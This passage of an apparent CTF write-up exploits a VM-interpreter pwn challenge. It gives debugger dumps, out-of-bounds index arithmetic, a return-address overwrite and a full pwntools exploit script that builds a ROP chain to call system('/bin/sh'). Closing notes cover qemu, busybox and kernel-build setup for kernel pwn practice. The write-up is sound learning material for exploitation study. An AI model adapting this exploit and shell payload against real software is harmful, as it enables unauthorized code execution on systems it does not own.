04:0020│  0x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:0028│  0x7ffd83e7d078 ◂— 0x1
06:0030│  0x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:0038│  0x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680

0x56066e9a3a20    call   printf@plt                <printf@plt>
format: 0x56066e9a404a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x5606

In [4]: (0x80000000000000ff-1)*2 /* note the "[--v9]" */
Out[4]: 18446744073709552124

In [5]: 0x7ffd83e7d070+18446744073709552124
Out[5]: 18446884800526013036

In [6]: hex(18446884800526013036)
Out[6]: '0x100007ffd83e7d26c'

pwndbg> telescope 0x7ffd83e7d26c
00:0000│       0x7ffd83e7d26c ◂— 0x83e7d37000005606 /* target */
01:0008│       0x7ffd83e7d274 ◂— 0x5793bc0000007ffd
02:0010│ rbp-4 0x7ffd83e7d27c ◂— 0x93e7a31e
  • Second pop:
pwndbg> telescope 0x7ffd83e7d050
00:0000│  0x7ffd83e7d050 ◂— 0x80000000000000fd /* v9=0x80000000000000fd */
01:0008│  0x7ffd83e7d058 ◂— 0x1
02:0010│  0x7ffd83e7d060 ◂— 0x6e9a56069165dcd4 /* v10 */
03:0018│  0x7ffd83e7d068 ◂— 0x80000000
04:0020│  0x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:0028│  0x7ffd83e7d078 ◂— 0x1
06:0030│  0x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:0038│  0x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680

0x56066e9a3a20    call   printf@plt                <printf@plt>
format: 0x56066e9a404a ◂— 0x205d2b5b000a6425 /* '%d\n' */
vararg: 0x6e9a

In [7]: (0x80000000000000fe-1)*2 /* note the "[--v9]" */
Out[7]: 18446744073709552122

In [8]: 0x7ffd83e7d070+18446744073709552122
Out[8]: 18446884800526013034

In [9]: hex(18446884800526013034)
Out[9]: '0x100007ffd83e7d26a'

pwndbg> telescope 0x7ffd83e7d26a 
00:0000│       0x7ffd83e7d26a ◂— 0xd370000056066e9a /* target */
01:0008│       0x7ffd83e7d272 ◂— 0xbc0000007ffd83e7
02:0010│ rbp-6 0x7ffd83e7d27a ◂— 0x93e7a31e5793

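These steps show that modifying "v9" through ldr and mv makes the program resolve "v12[target]" to the wrong place, so a pop loads out-of-bounds data into "v10". The value "v10" that a subsequent push writes is therefore under our control, and this is what allows the program's return address to be overwritten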

  • After the 4 ldr and 4 mv instructions:
pwndbg> telescope 0x7ffd83e7d050
00:0000│  0x7ffd83e7d050 ◂— 0x800000000000010e /* v9 */
01:0008│  0x7ffd83e7d058 ◂— 0x1
02:0010│  0x7ffd83e7d060 ◂— 0x6e9a56069165dcd4 /* v10[start] */
03:0018│  0x7ffd83e7d068 ◂— 0x800000000000010e
04:0020│  0x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:0028│  0x7ffd83e7d078 ◂— 0x1
06:0030│  0x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:0038│  0x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680

In [10]: 0x800000000000010e*2
Out[10]: 18446744073709552156

In [11]: 0x7ffd83e7d070+18446744073709552156
Out[11]: 18446884800526013068

In [12]: hex(18446884800526013068)
Out[12]: '0x100007ffd83e7d28c'

pwndbg> telescope 0x7ffd83e7d28c
00:0000│  0x7ffd83e7d28c ◂— 0xff1a62000007fa3
01:0008│  0x7ffd83e7d294 ◂— 0x83e7d37800007fa3
02:0010│  0x7ffd83e7d29c ◂— 0x7ffd
03:0018│  0x7ffd83e7d2a4 ◂— 0x6e9a32aa00000001
04:0020│  0x7ffd83e7d2ac ◂— 0x6e9a3a7000005606
05:0028│  0x7ffd83e7d2b4 ◂— 0x91fbed9200005606
06:0030│  0x7ffd83e7d2bc ◂— 0x6e9a310090176fc9
07:0038│  0x7ffd83e7d2c4 ◂— 0x83e7d37000005606

pwndbg> telescope 0x7ffd83e7d28c-4
00:0000│  0x7ffd83e7d288 —▸ 0x7fa30fd1d0b3 (__libc_start_main+243) ◂— mov edi, eax
01:0008│  0x7ffd83e7d290 —▸ 0x7fa30ff1a620 (_rtld_global_ro) ◂— 0x50d1300000000
02:0010│  0x7ffd83e7d298 —▸ 0x7ffd83e7d378 —▸ 0x7ffd83e7f39d ◂— 0x4a470061766d2f2e /* './mva' */
03:0018│  0x7ffd83e7d2a0 ◂— 0x100000000
04:0020│  0x7ffd83e7d2a8 —▸ 0x56066e9a32aa ◂— endbr64

With ldr and mv working together, the program now reaches the return address through "v9". The next step is to overwrite it
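
Where the value 0x10e comes from can be derived from the frame layout in the decompiler comments (v12 at rbp-0x210, return address at rbp+8). A short sketch, with hypothetical helper names:

```python
V12_OFF = -0x210   # v12, rbp-relative (from the decompiler comment)
RET_OFF = 0x8      # saved return address of main, rbp-relative

def word_index(rbp_offset):
    """Index i such that &v12[i] is rbp + rbp_offset (2-byte elements)."""
    delta = rbp_offset - V12_OFF
    assert delta % 2 == 0
    return delta // 2

def forged_v9(index):
    """Set the sign bit so the signed `v9 > 256` check in push still passes."""
    return (1 << 63) | index

low, mid, high = (word_index(RET_OFF + 2 * i) for i in range(3))
print(hex(low), hex(mid), hex(high), hex(forged_v9(high)))
```

The three 16-bit words of the return address sit at indices 0x10c, 0x10d and 0x10e. The payload starts at the highest one, which is why `ldr(2,1,0xe)` loads 0x010e and the dump shows v9 = 0x800000000000010e.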

  • First overwrite via push:
pwndbg> telescope 0x7ffd83e7d050
00:0000│  0x7ffd83e7d050 ◂— 0x800000000000010f /* v9 */
01:0008│  0x7ffd83e7d058 ◂— 0x1
02:0010│  0x7ffd83e7d060 ◂— 0x6e9a56069165dcd4 /* v10[0]=0x5606 */
03:0018│  0x7ffd83e7d068 ◂— 0x800000000000010e
04:0020│  0x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:0028│  0x7ffd83e7d078 ◂— 0x1
06:0030│  0x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:0038│  0x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680

pwndbg> telescope 0x7ffd83e7d28c-4 /* bytes [4-5] of the return address are overwritten with "0x5606" */
00:0000│  0x7ffd83e7d288 ◂— 0x56060fd1d0b3
01:0008│  0x7ffd83e7d290 —▸ 0x7fa30ff1a620 (_rtld_global_ro) ◂— 0x50d1300000000
02:0010│  0x7ffd83e7d298 —▸ 0x7ffd83e7d378 —▸ 0x7ffd83e7f39d ◂— 0x4a470061766d2f2e /* './mva' */
  • Second overwrite via push:
pwndbg> telescope 0x7ffd83e7d050
00:0000│  0x7ffd83e7d050 ◂— 0x800000000000010e /* v9 */
01:0008│  0x7ffd83e7d058 ◂— 0x1
02:0010│  0x7ffd83e7d060 ◂— 0xfd16e9a9165dcd4 /* v10[0]=0x6e9a */
03:0018│  0x7ffd83e7d068 ◂— 0x800000000000010e
04:0020│  0x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:0028│  0x7ffd83e7d078 ◂— 0x1
06:0030│  0x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:0038│  0x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680

pwndbg> telescope 0x7ffd83e7d28c-4 /* bytes [2-3] of the return address are overwritten with "0x6e9a" */
00:0000│  0x7ffd83e7d288 ◂— 0x56066e9ad0b3
01:0008│  0x7ffd83e7d290 —▸ 0x7fa30ff1a620 (_rtld_global_ro) ◂— 0x50d1300000000
02:0010│  0x7ffd83e7d298 —▸ 0x7ffd83e7d378 —▸ 0x7ffd83e7f39d ◂— 0x4a470061766d2f2e /* './mva' */
  • Third overwrite via push:
pwndbg> telescope 0x7ffd83e7d050
00:0000│  0x7ffd83e7d050 ◂— 0x800000000000010d /* v9 */
01:0008│  0x7ffd83e7d058 ◂— 0x1
02:0010│  0x7ffd83e7d060 ◂— 0xd0b351009165dcd4 /* v10[0]=0x5100 */
03:0018│  0x7ffd83e7d068 ◂— 0x800000000000010e
04:0020│  0x7ffd83e7d070 ◂— 0x0 /* v12[start] */
05:0028│  0x7ffd83e7d078 ◂— 0x1
06:0030│  0x7ffd83e7d080 —▸ 0x7fa30ff1c700 —▸ 0x7fa30ff1c190 —▸ 0x56066e9a2000 ◂— 0x10102464c457f
07:0038│  0x7ffd83e7d088 —▸ 0x7fa30feec680 ◂— 0x7fa30feec680

pwndbg> telescope 0x7ffd83e7d28c-4
00:0000│  0x7ffd83e7d288 —▸ 0x56066e9a5100 ◂— 0x14
01:0008│  0x7ffd83e7d290 —▸ 0x7fa30ff1a620 (_rtld_global_ro) ◂— 0x50d1300000000
02:0010│  0x7ffd83e7d298 —▸ 0x7ffd83e7d378 —▸ 0x7ffd83e7f39d ◂— 0x4a470061766d2f2e /* './mva' */

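The return address of main is now overwritten. Because the binary is PIE, the hard-coded low word 0x5100 only matches "start" when the randomized fourth hex digit of the load address happens to fit, so each attempt succeeds only with a small probability (about 1 in 16). The other parts of the "start" address are taken from values already present in the process: ldr and mv position "v9", and pop then loads them into "v10"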

.text:0000562438CCC100 ; void __fastcall __noreturn start(__int64, __int64, void (*)(void))
.text:0000562438CCC100 public start
.text:0000562438CCC100 start proc near
.text:0000562438CCC100 ; __unwind {
.text:0000562438CCC100 endbr64
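
The push/pop choreography that writes the three words from the highest index down can be replayed with a toy model. This is a simplified sketch, not the real interpreter: `MiniVM` is a hypothetical class, indices are used without the sign bit, and only the four instructions involved are modeled. Register and stack contents are taken from the debugging session above.

```python
class MiniVM:
    """Toy model of the MVA push/pop/mv/ldr semantics on 16-bit words."""

    def __init__(self, v9, regs, stack):
        self.v9 = v9
        self.regs = list(regs)
        self.stack = dict(stack)

    def push(self):                     # v12[v9] = v10[0]; ++v9
        self.stack[self.v9] = self.regs[0]
        self.v9 += 1

    def pop(self, r):                   # v10[r] = v12[--v9]
        self.v9 -= 1
        self.regs[r] = self.stack.get(self.v9, 0)

    def mv(self, src, dst):             # v10[dst] = v10[src]
        self.regs[dst] = self.regs[src]

    def ldr(self, r, value):            # v10[r] = immediate
        self.regs[r] = value & 0xFFFF

# Old return address 0x7fa30fd1d0b3, split into words at indices 0x10c..0x10e.
vm = MiniVM(0x10E, [0x5606, 0x6E9A, 0, 0, 0, 0],
            {0x10C: 0xD0B3, 0x10D: 0x0FD1, 0x10E: 0x7FA3})

vm.push()                                            # high word  <- 0x5606
vm.mv(1, 0); vm.pop(1); vm.pop(1); vm.push()         # middle word <- 0x6e9a
vm.ldr(0, 0x5100); vm.pop(1); vm.pop(1); vm.push()   # low word   <- 0x5100

ret = vm.stack[0x10C] | vm.stack[0x10D] << 16 | vm.stack[0x10E] << 32
print(hex(ret), hex(vm.v9))
```

Each `pop; pop; push` group moves the write position down by one word, which matches v9 going 0x10f, 0x10e, 0x10d in the three snapshots.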

With libc_base and pro_base leaked and the return address overwritten, the next input can carry the actual attack:

payload =  ldr(0,1,0xc) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0) 
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(pop_rdi1)
payload += b'\x09\x01'+p16(pop_rdi2)

payload += ldr(0,1,0x10) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(binsh1)
payload += b'\x09\x01'+p16(binsh2)
payload += b'\x09\x01'+p16(binsh3)

payload += ldr(0,1,0x14) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(ret1)
payload += b'\x09\x01'+p16(ret2)
payload += b'\x09\x01'+p16(ret3)

payload += ldr(0,1,0x18) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(system1)
payload += b'\x09\x01'+p16(system2)
payload += b'\x09\x01'+p16(system3)
payload += b'\x09\x01'+p16(0)

payload += p32(0x8) + p32(0xE4000000)
payload = payload.ljust(0x38*4,b'\x00')

payload += p32(8) + p32(0)
payload = payload.ljust(0xf8,b'\x00')
payload += b'/bin/sh\x00'

p.send(payload)

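The operations here are much the same as before: the ldr and mv instructions modify "v9", the push instruction uses "v9" as an index to reach the target location, and the data is then written over it piece by piece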
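The piece-by-piece write can be sketched as follows. This is a minimal illustration of how the exp splits a 64-bit address into 16-bit words and byte-swaps each one before handing it to p16(); the helper names swap16 and split_words are hypothetical. The swap presumably compensates for the byte order in which the VM decodes its 16-bit operand, but that is an assumption, since the write-up does not state it.

```python
def swap16(word):
    """Swap the two bytes of a 16-bit value, as the exp does before p16()."""
    return ((word & 0xFF00) >> 8) | ((word & 0x00FF) << 8)

def split_words(addr, count=3):
    """Split addr into `count` 16-bit words (lowest word first), each byte-swapped."""
    return [swap16((addr >> (16 * i)) & 0xFFFF) for i in range(count)]

# Address of system as it appears in the telescope output of this write-up.
system_addr = 0x7F45616B82C0
words = split_words(system_addr)
print([hex(w) for w in words])
```

Each returned word corresponds to one `b'\x09\x01' + p16(word)` push in the payload, replacing the repeated mask-and-shift lines for ret, system, pop_rdi and binsh.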

Let's look at the result:

/* First write: overwrite ret with pop rdi */
pwndbg> telescope 0x7ffefad1a128
00:00000x7ffefad1a128 —▸ 0x7f4561689b72 (init_cacheinfo+242) ◂— pop rdi
01:00080x7ffefad1a130 ◂— 0x98000000980
02:00100x7ffefad1a138 —▸ 0x7ffefad1a218 —▸ 0x7ffefad1a2f8 —▸ 0x7ffefad1c39d ◂— 0x4a470061766d2f2e /* './mva' */
/* Second write: fill in the address of "/bin/sh" (computed from pro_base) */
pwndbg> telescope 0x7ffefad1a128
00:00000x7ffefad1a128 —▸ 0x7f4561689b72 (init_cacheinfo+242) ◂— pop rdi
01:00080x7ffefad1a130 —▸ 0x5593c1a08138 ◂— 0x68732f6e69622f /* '/bin/sh' */
02:00100x7ffefad1a138 —▸ 0x7ffefad1a218 —▸ 0x7ffefad1a2f8 —▸ 0x7ffefad1c39d ◂— 0x4a470061766d2f2e /* './mva' */
/* Write a ret gadget to balance the stack frame */
pwndbg> telescope 0x7ffefad1a128
00:00000x7ffefad1a128 —▸ 0x7f4561689b72 (init_cacheinfo+242) ◂— pop rdi
01:00080x7ffefad1a130 —▸ 0x5593c1a08138 ◂— 0x68732f6e69622f /* '/bin/sh' */
02:00100x7ffefad1a138 —▸ 0x7f4561688679 (__libgcc_s_init+61) ◂— ret
03:00180x7ffefad1a140 ◂— 0x6188762000000000
/* Finally, write system */
pwndbg> telescope 0x7ffefad1a128
00:00000x7ffefad1a128 —▸ 0x7f4561689b72 (init_cacheinfo+242) ◂— pop rdi
01:00080x7ffefad1a130 —▸ 0x5593c1a08138 ◂— 0x68732f6e69622f /* '/bin/sh' */
02:00100x7ffefad1a138 —▸ 0x7f4561688679 (__libgcc_s_init+61) ◂— ret
03:00180x7ffefad1a140 —▸ 0x7f45616b82c0 (system) ◂— endbr64
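
The final stack layout shown in these dumps is an ordinary four-entry ROP chain. As a minimal sketch, it can be rebuilt in plain Python from the addresses in the telescope output and the offsets used in the exp. The extra ret is there to balance the stack; the usual reason is keeping it 16-byte aligned when system is entered, which is stated here as an assumption.

```python
import struct

# Bases recovered from the addresses in the dumps and the offsets in the exp.
libc_base = 0x7F4561689B72 - 0x23B72
elf_base = 0x5593C1A08138 - 0x4138

pop_rdi = libc_base + 0x23B72  # pop rdi gadget
binsh = elf_base + 0x4138      # "/bin/sh" string sent at the end of the payload
ret = libc_base + 0x22679      # lone ret, balances the stack before system
system = 0x7F45616B82C0        # address of system shown in the last dump

# Four little-endian qwords, in the order they sit on the stack.
chain = struct.pack("<4Q", pop_rdi, binsh, ret, system)
for off in range(0, len(chain), 8):
    print(hex(off), hex(struct.unpack_from("<Q", chain, off)[0]))
```

In the challenge itself this chain cannot be sent in one go; it has to be written 16 bits at a time through the VM's push instruction.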

Full exp: (it may take several brute-force attempts; sometimes the leaked information is wrong, and sometimes an error occurs)

#!/usr/bin/python3

from pwn import *
context.arch='amd64'

elf=ELF('./mva')
libc = ELF('./libc-2.31.so')
p=process('./mva')

def pack(op:int, p1:int = 0, p2:int = 0, p3:int = 0) -> bytes:
    return (op&0xff).to_bytes(1,'little') + \
        (p1&0xff).to_bytes(1,'little') + \
        (p2&0xff).to_bytes(1,'little') + \
        (p3&0xff).to_bytes(1,'little')

def ldr(p1,p2,p3):
    return pack(0x01, p1, p2, p3)

def add(p1, p2, p3):
    return pack(0x02, p1, p2, p3)

def sub(p1, p2, p3):
    return pack(0x03, p1, p2, p3)

def shr(p1, p2):
    return pack(0x06, p1, p2)

def xor(p1, p2, p3):
    return pack(0x07, p1, p2, p3)

def push():
    return pack(0x09)

def pop(p1):
    return pack(0x0a, p1)

def mul(p1, p2, p3):
    return pack(0x0D, p1, p2, p3)

def mv(p1, p2):
    return pack(0x0E, p1, p2)

def sh():
    return pack(0x0F)

p.recvuntil('[+] Welcome to MVA, input your code now :\n')

while True:
    try:
        p=process('./mva')
        sleep(0.01)

        pay = push()*8
        pay += sh()+push()+sh()+push()+sh()
        pay += ldr(0,0,0xf4) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
        pay += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)
        pay += sh() + push() + sh() + push() + sh()

        pay += ldr(0,0,0xff) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
        pay += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)
        pay += pop(0) + sh() + pop(1) + sh()
        pay += ldr(2,1,0xe) + ldr(3,0,0) + ldr(4,0,0) + ldr(5,0x80,0)
        pay += mv(2,0xf6) + mv(3,0xf7) + mv(4,0xf8) + mv(5,0xf9) + push()
        pay += mv(1,0) + pop(1) + pop(1) + push()
        pay += ldr(0,0x51,0) + pop(1) + pop(1) + push()

        pay = pay.ljust(0x100, b'\x00')

        p.send(pay)

        p.recvuntil('[+] MVA is starting ...\n')
        a = int(p.recv(6)[:-1])
        log.success("a: " + hex(a))
        b = int(p.recv(6)[:-1])
        log.success("b: " + hex(b))
        c = int(p.recv(6)[:-1])
        log.success("c: " + hex(c))
        d = (c << 32) | (b << 16) | a
        log.success("d: " + hex(d))
        libc.address = d - 0x223700
        log.success("libc.address: " + hex(libc.address))

        a = int(p.recv(6)[:-1])
        log.success("a: " + hex(a))
        b = int(p.recv(6)[:-1])
        log.success("b: " + hex(b))
        c = int(p.recv(6)[:-1])
        log.success("c: " + hex(c))
        d = (c << 32) | (b << 16) | a
        log.success("d: " + hex(d))
        elfbase = d - 0x1a70
        log.success("elfbase: " + hex(elfbase))

        pop_rdi = libc.address + 0x23b72
        log.success("pop_rdi: " + hex(pop_rdi))

        ret = libc.address + 0x22679
        ret1 = ret & 0xffff
        ret1 = ((ret1&0xff00)>>8) + ((ret1&0xff) << 8)
        ret2 = (ret & 0xffffffff)>>16
        ret2 = ((ret2&0xff00)>>8) + ((ret2&0xff) << 8)
        ret3 = (ret)>>32
        ret3 = ((ret3&0xff00)>>8) + ((ret3&0xff) << 8)

        system = libc.sym['system']
        log.success("system: " + hex(system))
        system1 = system & 0xffff
        system1 = ((system1&0xff00)>>8) + ((system1&0xff) << 8)
        log.success("system1: " + hex(system1))
        system2 = (system & 0xffffffff)>>16
        system2 = ((system2&0xff00)>>8) + ((system2&0xff) << 8)
        log.success("system2: " + hex(system2))
        system3 = (system)>>32
        system3 = ((system3&0xff00)>>8) + ((system3&0xff) << 8)
        log.success("system3: " + hex(system3))

        pop_rdi1 = pop_rdi & 0xffff
        pop_rdi1 = ((pop_rdi1&0xff00)>>8) + ((pop_rdi1&0xff) << 8)
        log.success("pop_rdi1: " + hex(pop_rdi1))
        pop_rdi2 = (pop_rdi & 0xffffffff)>>16
        pop_rdi2 = ((pop_rdi2&0xff00)>>8) + ((pop_rdi2&0xff) << 8)
        log.success("pop_rdi2: " + hex(pop_rdi2))

        binsh = elfbase + 0x4138
        log.success("binsh: " + hex(binsh))
        binsh1 = binsh & 0xffff
        binsh1 = ((binsh1&0xff00)>>8) + ((binsh1&0xff) << 8)
        log.success("binsh1: " + hex(binsh1))
        binsh2 = (binsh & 0xffffffff)>>16
        binsh2 = ((binsh2&0xff00)>>8) + ((binsh2&0xff) << 8)
        log.success("binsh2: " + hex(binsh2))
        binsh3 = (binsh)>>32
        binsh3 = ((binsh3&0xff00)>>8) + ((binsh3&0xff) << 8)
        log.success("binsh3: " + hex(binsh3))

        p.recvuntil('[+] Welcome to MVA, input your code now :\n')
    except EOFError:
        # the guess missed "start" and the process died: retry with a fresh process
        p.close()
        continue
    else:
        success("Success!!!")
        pause()
        # the program is back at "start": leave the retry loop and send the final payload
        break

payload = ldr(0,1,0xc) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(pop_rdi1)
payload += b'\x09\x01'+p16(pop_rdi2)

payload += ldr(0,1,0x10) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(binsh1)
payload += b'\x09\x01'+p16(binsh2)
payload += b'\x09\x01'+p16(binsh3)

payload += ldr(0,1,0x14) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(ret1)
payload += b'\x09\x01'+p16(ret2)
payload += b'\x09\x01'+p16(ret3)

payload += ldr(0,1,0x18) + ldr(1,0,0) + ldr(2,0,0) + ldr(3,0x80,0)
payload += mv(0,0xf6) + mv(1,0xf7) + mv(2,0xf8) + mv(3,0xf9)

payload += b'\x09\x01'+p16(system1)
payload += b'\x09\x01'+p16(system2)
payload += b'\x09\x01'+p16(system3)
payload += b'\x09\x01'+p16(0)

payload += p32(0x8) + p32(0xE4000000)
payload = payload.ljust(0x38*4,b'\x00')

payload += p32(8) + p32(0)
payload = payload.ljust(0xf8,b'\x00')
payload += b'/bin/sh\x00'

#gdb.attach(p)

p.send(payload)
p.interactive()
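
Since the leaked information is sometimes wrong, it can help to sanity-check a leak before building the second payload. A minimal sketch, assuming each pointer arrives as three 16-bit words (lowest first) as in the exp; the helper names and the sample words are hypothetical and not taken from a real run:

```python
def combine_leak(words):
    """Rebuild a 48-bit pointer from three 16-bit words, lowest word first."""
    a, b, c = words
    return (c << 32) | (b << 16) | a

def looks_like_base(addr):
    """A load base must be page-aligned and non-zero."""
    return addr != 0 and addr & 0xFFF == 0

# Hypothetical leaked words, for illustration only.
leak = combine_leak([0x3700, 0x6188, 0x7F45])
libc_base = leak - 0x223700  # offset used by the exp above
print(hex(leak), hex(libc_base), looks_like_base(libc_base))
```

If looks_like_base returns False, the run can be discarded and retried instead of sending a payload built from a bad address.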

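Summary

This challenge nearly killed me. I spent three days reproducing it: on day 1 I could not even patch the "jump table", and the messy code wrecked my morale; on day 2 the complicated algorithm crushed me, and it was past midnight before I got the two leaks out; on day 3 I debugged until I was sick of it

I could not get the official exp to work (the environment was different), which seriously hindered my understanding. In the end I slowly worked out what the program's code and the exp were doing, kept adjusting the exp by trial and error, and got it working (albeit while following the wp)

This was my first VMP pwn, and it was an eye-opener...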

kernel environ

Building the kernel by hand

qemu

A lightweight emulator and virtualizer; we mainly use the qemu-system- family

➜  ~ apt-get install qemu  

busybox

A lightweight set of userland tools, used here to build a minimal root filesystem for kernel development

Download busybox from:

https://busybox.net/downloads/
  • .tar.gz archives: extract with tar -zxvf xx.tar.gz
  • .tar.bz2 archives: extract with tar -jxvf xx.tar.bz2

Run the following command to configure the build:

➜  make menuconfig
│ ┌↑(-)─────────────────────────────────────────────────────────────────┐ │  
│ │[ ] Support NSA Security Enhanced Linux (NEW) │ │
│ │[ ] Clean up all memory before exiting (usually not needed) (NEW) │ │
│ │[*] Support LOG_INFO level syslog messages (NEW) │ │
│ │--- Build Options │ │
│ │[ ] Build static binary (no shared libs) (NEW) // target │ │
│ │[ ] Build position independent executable (NEW) │ │
│ │[ ] Force NOMMU build (NEW) │ │
│ │[ ] Build shared libbusybox (NEW) │ │
│ │() Cross compiler prefix (NEW) │ │
│ │() Path to sysroot (NEW)

Press "Y" on "Build static binary" to select it (static linking, so that no shared libraries have to be added)

Exit and save when prompted, then compile busybox:

➜  make -j4    
➜ make install

The "_install" directory holds the compiled files. Run the following command: (copy rootfs)

➜  cp rootfs -r ..

Create the following directories and the init file under _install

➜  mkdir proc
mkdir sys
touch init
chmod +x init

init is the Linux initialization script; its contents are:

#!/bin/sh
mkdir /tmp
mount -t proc none /proc
mount -t sysfs none /sys
mount -t debugfs none /sys/kernel/debug
mount -t tmpfs none /tmp
mdev -s # We need this to find /dev/sda later
setsid /bin/cttyhack setuidgid 1000 /bin/sh

Create pack.sh as the script that packs the root filesystem, with the following contents:

#!/bin/sh
echo "Generate rootfs.img"
cd busybox # fs folder
find . | cpio -o --format=newc > ../rootfs.img

Create start.sh as the Linux boot script, with the following contents:

#!/bin/sh
qemu-system-x86_64 \
-m 64M \
-nographic \
-kernel ./bzImage \
-initrd ./rootfs.img \
-append "root=/dev/ram rw console=ttyS0 oops=panic panic=1 kaslr" \
-smp cores=2,threads=1 \
-cpu kvm64
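
When the boot options need to change often (for example, turning KASLR off while debugging), it can be easier to generate the command line than to edit start.sh by hand. A minimal sketch that mirrors the flags of start.sh; the function name build_qemu_cmd and its parameters are hypothetical, and nokaslr is the standard kernel parameter for disabling KASLR:

```python
import shlex

def build_qemu_cmd(kernel="./bzImage", initrd="./rootfs.img", mem="64M",
                   disable_kaslr=False):
    """Return an argument list that mirrors the qemu invocation in start.sh."""
    append = "root=/dev/ram rw console=ttyS0 oops=panic panic=1"
    if disable_kaslr:
        # nokaslr keeps kernel addresses fixed between boots, handy for debugging
        append += " nokaslr"
    return [
        "qemu-system-x86_64",
        "-m", mem,
        "-nographic",
        "-kernel", kernel,
        "-initrd", initrd,
        "-append", append,
        "-smp", "cores=2,threads=1",
        "-cpu", "kvm64",
    ]

cmd = build_qemu_cmd(disable_kaslr=True)
print(shlex.join(cmd))
```

The list can be passed directly to subprocess.run(cmd) once bzImage and rootfs.img exist in the current directory.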

kernel pwn

A typical kernel pwn challenge ships three files

boot.sh (boot script - ".sh")
bzImage (kernel - "bzImage")
initramfs.cpio (bundled busybox filesystem - ".cpio")

The busybox filesystem contains the corresponding driver file

pwn.ko (driver file - ".ko")

Use the file command to get information about the target kernel

➜  babykernel file bzImage
bzImage: Linux kernel x86 boot executable bzImage, version 4.19.26 (bird@ubuntu18) #2 SMP Tue Jun 4 18:57:49 CST 2019, RO-rootFS, swap_dev 0x8, Normal VGA

Download the matching kernel version from the official kernel site

https://mirrors.edge.kernel.org/pub/linux/kernel/v4.x/ 

Then check which compiler it was built with (the gcc version affects compilation)

➜  babykernel strings bzImage | grep gcc
yygcc3s!
4.19.26 (bird@ubuntu18) (gcc version 7.4.0 (Ubuntu 7.4.0-1ubuntu1~18.04)) #2 SMP Tue Jun 4 18:57:49 CST 2019
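
The two lookups above (kernel version, gcc version) can be pulled out of the banner automatically. A minimal sketch using only the banner string shown in this post; the function name parse_banner is hypothetical, and the tarball name assumes the usual linux-<version>.tar.xz naming on kernel.org:

```python
import re

BANNER = ("4.19.26 (bird@ubuntu18) (gcc version 7.4.0 "
          "(Ubuntu 7.4.0-1ubuntu1~18.04)) #2 SMP Tue Jun 4 18:57:49 CST 2019")

def parse_banner(banner):
    """Extract (kernel_version, gcc_version) from a kernel version banner."""
    kernel = re.match(r"\d+(?:\.\d+)+", banner)
    gcc = re.search(r"gcc version (\d+(?:\.\d+)+)", banner)
    if kernel is None or gcc is None:
        raise ValueError("unrecognised banner")
    return kernel.group(0), gcc.group(1)

kernel_ver, gcc_ver = parse_banner(BANNER)
major = kernel_ver.split(".")[0]
# Assumption: tarball name follows the usual kernel.org convention.
tarball_url = ("https://mirrors.edge.kernel.org/pub/linux/kernel/"
               f"v{major}.x/linux-{kernel_ver}.tar.xz")
gcc_package = "gcc-" + gcc_ver.split(".")[0]
print(kernel_ver, gcc_ver, gcc_package)
print(tarball_url)
```

For this banner the result points at the v4.x directory and at the gcc-7 package.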

Run the following command to configure the build: (just exit; the defaults are fine)

➜  make menuconfig 

Switch the gcc version before compiling the kernel

ls -l /usr/bin/gcc*
sudo apt-get install -y gcc-7 g++-7
sudo update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-7 20 --slave /usr/bin/g++ g++ /usr/bin/g++-7
sudo update-alternatives --config gcc
gcc -v

Next, compile the kernel ("-jN" sets the number of parallel jobs)

➜  make bzImage -j4
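  • bzImage: arch/x86/boot/bzImage
  • vmlinux: in the root of the source tree

Downloading an existing kernel

Use the following command to list the kernel images available for download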

sudo apt search linux-image-

